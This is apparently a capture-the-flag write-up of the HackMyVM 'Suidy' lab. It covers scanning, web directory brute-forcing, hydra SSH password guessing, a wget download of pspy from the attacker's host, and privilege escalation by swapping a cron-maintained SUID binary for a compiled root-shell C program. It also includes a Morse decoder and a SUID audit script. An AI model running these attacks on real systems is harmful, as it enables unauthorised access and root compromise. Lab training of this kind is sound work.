HackMyVM - Suidy

suidy

scan

❯ rustscan -a  192.168.0.109 -- -A -sV
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
53/tcp open domain syn-ack (generic dns response: SERVFAIL)
80/tcp open http syn-ack nginx 1.14.2
| http-methods:
|_ Supported Methods: GET HEAD
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: nginx/1.14.2
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :

web

❯ gobuster dir -u http://192.168.0.109/ -w ~/ctf/tool/dic/dir.txt
/index.html (Status: 200) [Size: 22]
/robots.txt (Status: 200) [Size: 362]
view-source:http://192.168.0.109/robots.txt

/hi
/....\..\.-\--.\.-\..\-.
/shehatesme

.... .. .- --. .- .. -.
decoded from Morse code: HIAGAIN / hiagain
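Decoding that robots.txt entry offline, as an added example (not part of the original writeup): the entry uses backslashes between letters instead of the usual spaces, so the helper accepts either separator and maps unknown tokens to "?" rather than crashing. The decoder table and the function names are this example's own.

```python
# Morse decoder for robots.txt entries like /....\..\.-\--.\.-\..\-.
# (added example; the table covers letters and digits only)
MORSE = {
    ".-": "A", "-...": "B", "-.-.": "C", "-..": "D", ".": "E", "..-.": "F",
    "--.": "G", "....": "H", "..": "I", ".---": "J", "-.-": "K", ".-..": "L",
    "--": "M", "-.": "N", "---": "O", ".--.": "P", "--.-": "Q", ".-.": "R",
    "...": "S", "-": "T", "..-": "U", "...-": "V", ".--": "W", "-..-": "X",
    "-.--": "Y", "--..": "Z",
    "-----": "0", ".----": "1", "..---": "2", "...--": "3", "....-": "4",
    ".....": "5", "-....": "6", "--...": "7", "---..": "8", "----.": "9",
}


def decode_morse(message, sep=" "):
    """Decode a Morse string; tokens are split on `sep`, "/" marks a word gap,
    and anything not in the table becomes "?" so the rest still decodes."""
    out = []
    for token in message.split(sep):
        if not token:
            continue
        if token == "/":
            out.append(" ")
        else:
            out.append(MORSE.get(token, "?"))
    return "".join(out)


def decode_robots_entry(entry):
    """Decode a robots.txt path whose letters are separated by backslashes."""
    return decode_morse(entry.lstrip("/"), sep="\\")


if __name__ == "__main__":
    print(decode_morse(".... .. .- --. .- .. -."))          # HIAGAIN
    print(decode_robots_entry("/....\\..\\.-\\--.\\.-\\..\\-."))  # HIAGAIN
```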

http://192.168.0.109/shehatesme/

She hates me because I FOUND THE REAL SECRET!
I put in this directory a lot of .txt files.
ONE of .txt files contains credentials like "theuser/thepass" to access to her system!
All that you need is an small dict from Seclist!

❯ gobuster dir -u http://192.168.0.109/shehatesme/ -w ~/ctf/tool/dic/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x txt
/full.txt
/about.txt
/search.txt
/privacy.txt
/blog.txt
/new.txt
/page.txt
/forums.txt
/jobs.txt
/other.txt
/welcome.txt
/admin.txt
/faqs.txt
/2001.txt
/link.txt
/space.txt
/network.txt
/google.txt
/folder.txt
/java.txt
/issues.txt
/guide.txt
/es.txt
/art.txt
/smilies.txt
/airport.txt
/secret.txt
/procps.txt
/pynfo.txt
/lh2.txt
/muze.txt
/alba.txt
/cymru.txt
/wha.txt

request and get file

import requests
import sys

# each line on stdin is a path found by gobuster, e.g. "/full.txt";
# fetch it under /shehatesme/ and print the body so the output can be piped
# through sort | uniq -c to spot the credential lines
for j in sys.stdin:
    j = j.strip()
    if not j:
        continue
    response = requests.get(f"http://192.168.0.109/shehatesme{j}")
    # print(f"http://192.168.0.109/shehatesme{j}")
    print(response.text)

bruteforce

❯ cat tmp | python tmp.py | sort | uniq -c
34
1 hidden1/passZZ!
25 jaime11/JKiufg6
1 jhfbvgt/iugbnvh
1 john765/FDrhguy
1 maria11/jhfgyRf
1 mmnnbbv/iughtyr
1 nhvjguy/kjhgyut
1 smileys/98GHbjh
1 theuser/thepass
1 yuijhse/hjupnkk

❯ hydra -L ./tmp -P ./tmp2 ssh://192.168.0.109
[22][ssh] host: 192.168.0.109 login: theuser password: thepass

hidden1:passZZ!
jaime11:JKiufg6
jhfbvgt:iugbnvh
john765:FDrhguy
maria11:jhfgyRf
mmnnbbv:iughtyr
nhvjguy:kjhgyut
smileys:98GHbjh
theuser:thepass
yuijhse:hjupnkk

❯ hydra -C ./tmp ssh://192.168.0.109
[22][ssh] host: 192.168.0.109 login: theuser password: thepass

ssh

theuser/thepass
❯ ssh theuser@192.168.0.109
theuser@suidy:~$ ls -al
total 36
drwxr-xr-x 3 theuser theuser 4096 sep 27 2020 .
drwxr-xr-x 4 root root 4096 sep 26 2020 ..
-rw------- 1 theuser theuser 29 sep 27 2020 .bash_history
-rw-r--r-- 1 theuser theuser 220 sep 26 2020 .bash_logout
-rw-r--r-- 1 theuser theuser 3526 sep 26 2020 .bashrc
drwxr-xr-x 3 theuser theuser 4096 sep 26 2020 .local
-rw-r--r-- 1 theuser theuser 807 sep 26 2020 .profile
-rw-r--r-- 1 theuser theuser 11 sep 26 2020 user.txt
-rw------- 1 theuser theuser 51 sep 26 2020 .Xauthority
theuser@suidy:~$ cat user.txt
HMV2353IVI

theuser@suidy:~$ find / -perm -u=s -type f 2>/dev/null | xargs ls -la
-rwsrwsr-x 1 root theuser 16704 sep 26 2020 /home/suidy/suidyyyyy
-rwsr-xr-x 1 root root 54096 jul 27 2018 /usr/bin/chfn
-rwsr-xr-x 1 root root 44528 jul 27 2018 /usr/bin/chsh
-rwsr-xr-x 1 root root 84016 jul 27 2018 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 51280 ene 10 2019 /usr/bin/mount
-rwsr-xr-x 1 root root 44440 jul 27 2018 /usr/bin/newgrp
-rwsr-xr-x 1 root root 63736 jul 27 2018 /usr/bin/passwd
-rwsr-xr-x 1 root root 63568 ene 10 2019 /usr/bin/su
-rwsr-xr-x 1 root root 34888 ene 10 2019 /usr/bin/umount
-rwsr-xr-- 1 root messagebus 51184 jun 9 2019 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 10232 mar 28 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 436552 ene 31 2020 /usr/lib/openssh/ssh-keysign

theuser@suidy:/home/suidy$ ./suidyyyyy
suidy@suidy:/home/suidy$ id
uid=1001(suidy) gid=1000(theuser) grupos=1000(theuser),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
suidy@suidy:/home/suidy$ cat note.txt
I love SUID files!
The best file is suidyyyyy because users can use it to feel as I feel.
root know it and run an script to be sure that my file has SUID.
If you are "theuser" I hate you!

-suidy

upload

❯ python -m http.server
suidy@suidy:/home/suidy$ wget http://192.168.0.105:8000/pspy64

2025/08/08 14:49:41 CMD: UID=0 PID=1 | /sbin/init
2025/08/08 14:50:01 CMD: UID=0 PID=1446 | /usr/sbin/CRON -f
2025/08/08 14:50:01 CMD: UID=0 PID=1447 | /usr/sbin/CRON -f
2025/08/08 14:50:01 CMD: UID=0 PID=1448 | /bin/sh -c sh /root/timer.sh
2025/08/08 14:50:01 CMD: UID=0 PID=1449 | sh /root/timer.sh
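The weakness here is not the SUID bit itself but that root's cron job (timer.sh) keeps re-applying it to a file that a non-root group can write: `-rwsrwsr-x root theuser /home/suidy/suidyyyyy`. The audit below is an added example (not from the writeup or the box) that flags exactly that condition: a setuid/setgid file that is group- or world-writable. It parses `ls -l` lines like the listing above (embedded here as constructed sample input) and also has a live mode that walks a filesystem with `os.lstat`; function names are this example's own.

```python
import os
import stat

# Constructed sample input: the SUID listing seen on the box in this writeup.
SAMPLE_LISTING = """\
-rwsrwsr-x 1 root theuser 16704 sep 26 2020 /home/suidy/suidyyyyy
-rwsr-xr-x 1 root root 54096 jul 27 2018 /usr/bin/chfn
-rwsr-xr-x 1 root root 44528 jul 27 2018 /usr/bin/chsh
-rwsr-xr-x 1 root root 84016 jul 27 2018 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 51280 ene 10 2019 /usr/bin/mount
-rwsr-xr-x 1 root root 44440 jul 27 2018 /usr/bin/newgrp
-rwsr-xr-x 1 root root 63736 jul 27 2018 /usr/bin/passwd
-rwsr-xr-x 1 root root 63568 ene 10 2019 /usr/bin/su
-rwsr-xr-x 1 root root 34888 ene 10 2019 /usr/bin/umount
-rwsr-xr-- 1 root messagebus 51184 jun 9 2019 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 10232 mar 28 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 436552 ene 31 2020 /usr/lib/openssh/ssh-keysign
"""

# permission bits in the order they appear in "rwxrwxrwx"
_PERM_BITS = [stat.S_IRUSR, stat.S_IWUSR, stat.S_IXUSR,
              stat.S_IRGRP, stat.S_IWGRP, stat.S_IXGRP,
              stat.S_IROTH, stat.S_IWOTH, stat.S_IXOTH]


def symbolic_to_bits(mode):
    """Turn an ls mode string such as '-rwsrwsr-x' into st_mode-style bits.
    's'/'S' at the user or group slot set setuid/setgid, 't'/'T' set sticky."""
    bits = 0
    for i, (ch, bit) in enumerate(zip(mode[1:10], _PERM_BITS)):
        if ch == "-":
            continue
        if ch in "rwx":
            bits |= bit
        elif ch in "sS":
            bits |= stat.S_ISUID if i == 2 else stat.S_ISGID
            if ch == "s":          # lower-case means exec bit is also set
                bits |= bit
        elif ch in "tT":
            bits |= stat.S_ISVTX
            if ch == "t":
                bits |= bit
    return bits


def risky_reasons(bits, group_label):
    """Why a setuid/setgid file is dangerous: whoever can write it owns the
    privilege it grants. Returns [] for files that are not setuid/setgid."""
    if not bits & (stat.S_ISUID | stat.S_ISGID):
        return []
    reasons = []
    if bits & stat.S_IWGRP:
        reasons.append(f"group-writable by {group_label}")
    if bits & stat.S_IWOTH:
        reasons.append("world-writable")
    return reasons


def parse_ls_line(line):
    """Split one `ls -l` line into (mode, owner, group, path); None if malformed."""
    parts = line.split(None, 8)
    if len(parts) != 9:
        return None
    mode, _links, owner, group, _size, _month, _day, _time, path = parts
    return mode, owner, group, path


def audit_suid_listing(listing):
    """Audit captured `ls -l` output; returns [(path, [reasons...]), ...]."""
    findings = []
    for line in listing.splitlines():
        parsed = parse_ls_line(line)
        if parsed is None:
            continue
        mode, _owner, group, path = parsed
        reasons = risky_reasons(symbolic_to_bits(mode), group)
        if reasons:
            findings.append((path, reasons))
    return findings


def audit_live_filesystem(start="/"):
    """Same check against the running host, walking from `start` with lstat."""
    findings = []
    for dirpath, _dirs, files in os.walk(start):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if not stat.S_ISREG(st.st_mode):
                continue
            reasons = risky_reasons(st.st_mode, f"gid {st.st_gid}")
            if reasons:
                findings.append((path, reasons))
    return findings


if __name__ == "__main__":
    for path, reasons in audit_suid_listing(SAMPLE_LISTING):
        print(path, "->", "; ".join(reasons))
```

Run against the sample it reports only /home/suidy/suidyyyyy (group-writable by theuser); every stock binary in the list is `-rwsr-xr-x` or `-rwsr-xr--` and passes. Scheduling `audit_live_filesystem` from root's cron would catch the same problem the timer.sh job creates, instead of silently restoring it.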

upload and gcc and replace suidyyyyy

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>

/* rootshell.c: dropped in place of /home/suidy/suidyyyyy; root's cron job
   (timer.sh) re-applies the SUID bit, after which running it spawns a root shell */
int main(void)
{
    setuid(0);
    setgid(0);
    system("/bin/bash");
    return 0;
}
theuser@suidy:~$ gcc rootshell.c -o suidyyyyy
theuser@suidy:~$ cp suidyyyyy /home/suidy/suidyyyyy

theuser@suidy:/home/suidy$ ./suidyyyyy
root@suidy:/home/suidy# id

root@suidy:/root# cat root.txt
HMV0000EVE